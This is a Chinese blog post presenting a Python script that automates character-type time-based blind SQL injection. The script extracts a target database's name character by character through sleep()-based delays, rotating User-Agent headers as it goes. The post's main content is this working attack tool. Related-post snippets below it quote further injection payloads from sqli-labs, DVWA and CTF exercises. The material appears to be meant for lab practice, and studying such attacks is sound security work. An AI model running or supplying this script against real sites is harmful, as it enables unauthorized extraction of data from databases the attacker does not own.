SQL注入代码实践(盲注-获取数据库名长度【字符型】)

已于 2022-08-20 18:49:12 修改
阅读量477 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: python 开发语言
于 2022-08-20 18:44:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/DMHY123/article/details/126443062
该博客介绍了一个Python实现的字符型盲注检测工具。通过替换SQL语句中的特定字符,利用sleep函数延迟响应时间来判断数据库中是否存在目标字符串。工具使用了正则表达式进行字符串匹配,并通过HTTP请求进行注入测试,根据响应时间判断是否存在盲注漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:22
@Auth : zhangxiang
@File :BlindInject_Str.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)

"""
#字符型盲注取数据库名
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list

class BlindInject_Str(object):
    def __init__(self):
        pass
    def StartInject_Str(self,code,StrList,url,Length):
        for num in range(1, Length+1):
            url = url
            judgeStr = "%20and%20if(substr((select%20database()),changeNum,1)=%27replaceStr%27,sleep(2),1)%23"
            submitStr = "&submit=0x5375626D6974%23"
            pattern1 = r"changeNum"
            replace1 = str(num)
            FisWord = re.sub(pattern1, replace1, judgeStr)
            for x in code:
                Str = x
                word = FisWord + submitStr
                # 正则
                pattern2 = r"replaceStr"
                replace2 = Str
                SeWord = re.sub(pattern2, replace2, word)
                full_url = url + SeWord
                # print(full_url)
                # 2.发请求保存到本地
                headers = {'User-Agent':random.choice(ua_list)}
                startTime = time.time()
                req = request.Request(url=full_url, headers=headers)
                res = request.urlopen(req)
                endTime = time.time()
                allTime = endTime - startTime
                # print(allTime)
                if (allTime > 2):
                    print("*" * 200)
                    StrList.append(x)
                    print("得到盲注结果:" + str(StrList))
                    print("注入的payload:" + full_url)
                    print("使用的时间:" + str(allTime))
                    print("*" * 200)
                else:
                    pass
        return StrList

《网络安全自学教程》- SQL注入之布尔原理+步骤+实战操作
wangyuxiang946的博客
05-13 1万+
这篇文章为大家解析布尔实现原理,结合实战案例讲解布尔使用步骤
SQL注入-时间
dkxkl1314的博客
03-11 969
就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为。时间忙住特性在页面中,不管用户输入什么,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。如下图不管我们输入什么,页面显示结果都是一样的1、判断是否存在注入2、获取数据库长度3、逐字猜解数据库名4、猜解表名数量5、猜解某个表名长度6、逐字猜解表名。
sql时间型: 求数据库名
mahao_1559的博客
07-25 1586
数据库名: 输入id:1' and if(ascii(substr(database(),1,1))>125,0,sleep(5)) %23 错误,反应时间长(5s) 输入id:1' and if(ascii(substr(database(),1,1))<125,0,sleep(5)) %23 正确,反应时间长(0s) 输入id:1' and if(ascii(substr(...
SQL注入代码实践-获取数据库名长度【数值型】)
DMHY123的博客
08-20 1162
代码SQL注入代码实践-获取数据库名长度【数值型】)
返回为bool类型字符型
qq_43943098的博客
07-13 423
什么情况要用? http://ctf5.shiyanbar.com/423/web/ 2.http://ctf5.shiyanbar.com/web/index_2.php 在实验吧的简单sql注入1,2里面(链接如上),当用户输入sql的语句有错误的时候,web后台会直接无修改的把信息反馈到界面上。 然而简单的sql注入3题却不是这样的他的返回只有Hello,或者没有东西。 又或者...
(手工)【sqli-labs28、28a】字符型注入、过滤
07-14 1245
SQL-字符型注入、过滤】
2021-07-08 CTFer成长之路-SQL注入-字符型注入和布尔
热门推荐
时光隧道
07-08 5万+
一:字符型注入和布尔 访问http://192.168.20.133/sql2.php?id=3-2,结果为空,猜测不是数字型,可能是字符型。继续尝试访问http://192.168.20.133/sql2.php?id=2a 有数据说明确实是字符型。 尝试使用单引号来闭合前面的单引号,再用“–%20”或“%23”释后面的语句。意,这里一定要URL编码,空格的编码是“%20”,“#”的编码是“%23”,单引号的编码是“%27”。 上面的情况只是一个参数,在两个参数的情况下则可以利用MySQL自带的函
SQL-实战布尔
dkxkl1314的博客
03-09 3373
环境:win10靶场:sqli-labs-master就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为。而布尔就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL注入之基于布尔的详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
sql注入-布尔脚本
m0_58853680的博客
01-03 581
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度获取当前数据库中的所有表名(使用group_
SQL
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-05 205
---------------------------------------------------------------------数字型--------------------------------------------------------------------------------------------------------------------------------字符型-----------------------------------------------
SqliLab_Mysql_Injection详解_字符型注入()_布尔(5)
qq_41260930的博客
10-20 652
SqlLab_Mysql_Injection详解_字符型注入() SQL注入_布尔 原理 由于服务器在接受请求后,返回的页面存在无报错,无回显的情况,这时候如果再利用UNION联合查询法查看显位就失效了,只能基于SQL语句的True or False,并通过页面的不同(显示正确或者错误)来判断,从而达到注入的目的来获取相应的信息; 布尔的核心思想 正确时,页面返回正常;不正确时,页面返回...
SqliLab_Mysql_Injection详解_字符型注入()_时间(8~10)
qq_41260930的博客
10-24 718
SqlLab_Mysql_Injection详解_字符型注入() SQL注入_时间 原理 当在服务器后台关闭了返回页面的错误回显或过滤了某些关键字,返回的网页只会返回一种状态(无法通过传统的布尔(true or false)来判断了),这时候就需要用到时间了,时间成功时,服务器会由于执行了构造语句中的sleep()函数,休眠一定的时间,再返回数据;通过观察浏览器客户端发送请求,到...
DVWA------SQL Injection (Blind)SQL
m0_65712192的博客
12-09 3935
DVWA------SQL Injection (Blind)SQL
sql注入字符型注入
2401_82760239的博客
03-30 1569
接下来查看flag表名下的字段名,用-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#首先用-1' union select 1,group_concat(schema_name) from information_schema.schemata #,列出所有的数据库。(或称为系统架构)是非常重要的。
dvwa-sql
01mx的博客
02-05 588
SQL VS 普通SQL注入: 普通SQL注入: 1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 2.一般在页面上直接就会显示执行sql语句的结果 SQL:(不显示错误信息,不能在前端显示) 1.一般情况,执行SQL,服务器不会直接返回具体的数据库错误or die语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的) 2.一般在页面上不会直接显示sql执行的结果 3.有可能出现不确定sql是否执行的情况 SQL-测试流程 1.
DVWA详解
qq_45788625的博客
04-18 7108
low等级DVWA详解
dvwa和pikachu靶场语句
waxcj的博客
11-13 1322
dvwa时间 pikachu布尔
SQL注入分类,一看你就明白了。SQL注入点_SQL注入类型_SQL注入有几种_SQL注入点分类
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-12 440
根据输入的 「参数」类型,可以将SQL注入分为两大类: 「数值型」注入、 「字符型注入
SQL注入实战:sqlmap运用解析
"这篇文档是关于网络安全实验,特别是SQL注入技术的一个实践教程,重点在于和使用sqlmap工具。实验在Windows 7 x64系统作为靶机,Kali Linux作为攻击机的环境中进行,两台机器位于同一局域网内。靶机上运行了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值